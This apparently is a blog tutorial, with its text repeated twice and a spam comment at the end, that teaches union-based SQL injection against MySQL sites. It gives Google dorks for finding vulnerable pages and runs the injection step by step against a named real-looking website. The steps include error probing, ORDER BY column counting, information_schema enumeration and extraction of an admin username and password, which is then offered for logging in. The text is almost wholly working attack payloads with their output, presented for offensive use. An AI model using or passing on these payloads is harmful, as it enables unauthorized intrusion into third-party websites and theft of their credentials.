The soul purpose o fthis tutorial is to show you how to perform query based sql injection technique to retrive admin username and password.This is very easy once you understand everything.this tutorial is only for mysql version>5
1st step is to find a sql vulnerable link.This type of link can be found by the following type of google dork
"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
all with out "
we are here taking the following site
http://www.dynamicinst.net/news.php?id=25
after finding this link now we have to add a ' after 25 i.e
http://www.dynamicinst.net/news.php?id=25'
if the following link give some error such as
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
then it is vulnerable to sql injection
after that we have to verify the number of columns and this can be perfromed by hte following command
http://www.dynamicinst.net/news.php?id=25 order by 1 (no error)
http://www.dynamicinst.net/news.php?id=25 order by 2 (no error)
http://www.dynamicinst.net/news.php?id=25 order by 3 (no error)
http://www.dynamicinst.net/news.php?id=25 order by 4 (no error)
http://www.dynamicinst.net/news.php?id=25 order by 5 (no error)
http://www.dynamicinst.net/news.php?id=25 order by 6 (error)
it means there are 5 columns in the database
Then we have to find the most vulnerable column.for this enter this command
http://www.dynamicinst.net/news.php?id=-25 union all select 1,2,3,4,5--
this will show this some number among 1,2,3,4,5
for this link it is 3 and 5.
suppose we select 3(you can also select 5)
N.B.
if we not place a negative sign before 25 then ot will show nothing
then we have to find the version of mysql.
http://www.dynamicinst.net/news.php?id=-25 union all select 1,2,@@version,4,5--
or
http://www.dynamicinst.net/news.php?id=-25 union all select 1,2,version(),4,5--
output is 5.0.27
in this way you can find database name and user of mysql by replacing version() with dabase() and user()
Then we have to find all the table names
http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables--
output:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,careers,contacts,dealer_news,events,extranet_users,faq,login,manuals,myphpvote,news,product_type,products,solution
Our aim is to find the admin username and password.for this we have to select the appropiate table name among the above table names and here it is login
then we have to find all columns from login table
http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='login'--
if this not work convert login to char form
http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(108 111 103 105 110 )--
but the previous command worked here.
outpur:
user,password
here we got the right column names.
then we have to extract user name and password from these columns.
http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,concat(user,0x3a,password),4,5 from login--
here 0x3a works as a separator
output:
Tom:Webb
here user=Tom
password=Webb
We have successfully extracted the username and password .
now you can login as a admin.
For finding admin link of the website you an use 'Havij' software
thank you...
1st step is to find a sql vulnerable link.This type of link can be found by the following type of google dork
"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
all with out "
we are here taking the following site
http://www.dynamicinst.net/news.php?id=25
after finding this link now we have to add a ' after 25 i.e
http://www.dynamicinst.net/news.php?id=25'
if the following link give some error such as
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
then it is vulnerable to sql injection
after that we have to verify the number of columns and this can be perfromed by hte following command
http://www.dynamicinst.net/news.php?id=25 order by 1 (no error)
http://www.dynamicinst.net/news.php?id=25 order by 2 (no error)
http://www.dynamicinst.net/news.php?id=25 order by 3 (no error)
http://www.dynamicinst.net/news.php?id=25 order by 4 (no error)
http://www.dynamicinst.net/news.php?id=25 order by 5 (no error)
http://www.dynamicinst.net/news.php?id=25 order by 6 (error)
it means there are 5 columns in the database
Then we have to find the most vulnerable column.for this enter this command
http://www.dynamicinst.net/news.php?id=-25 union all select 1,2,3,4,5--
this will show this some number among 1,2,3,4,5
for this link it is 3 and 5.
suppose we select 3(you can also select 5)
N.B.
if we not place a negative sign before 25 then ot will show nothing
then we have to find the version of mysql.
http://www.dynamicinst.net/news.php?id=-25 union all select 1,2,@@version,4,5--
or
http://www.dynamicinst.net/news.php?id=-25 union all select 1,2,version(),4,5--
output is 5.0.27
in this way you can find database name and user of mysql by replacing version() with dabase() and user()
Then we have to find all the table names
http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables--
output:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,careers,contacts,dealer_news,events,extranet_users,faq,login,manuals,myphpvote,news,product_type,products,solution
Our aim is to find the admin username and password.for this we have to select the appropiate table name among the above table names and here it is login
then we have to find all columns from login table
http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='login'--
if this not work convert login to char form
http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(108 111 103 105 110 )--
but the previous command worked here.
outpur:
user,password
here we got the right column names.
then we have to extract user name and password from these columns.
http://www.dynamicinst.net/news.php
?id=-25 union all select 1,2,concat(user,0x3a,password),4,5 from login--
here 0x3a works as a separator
output:
Tom:Webb
here user=Tom
password=Webb
We have successfully extracted the username and password .
now you can login as a admin.
For finding admin link of the website you an use 'Havij' software
thank you...
informative post
ReplyDeletejealousy quotes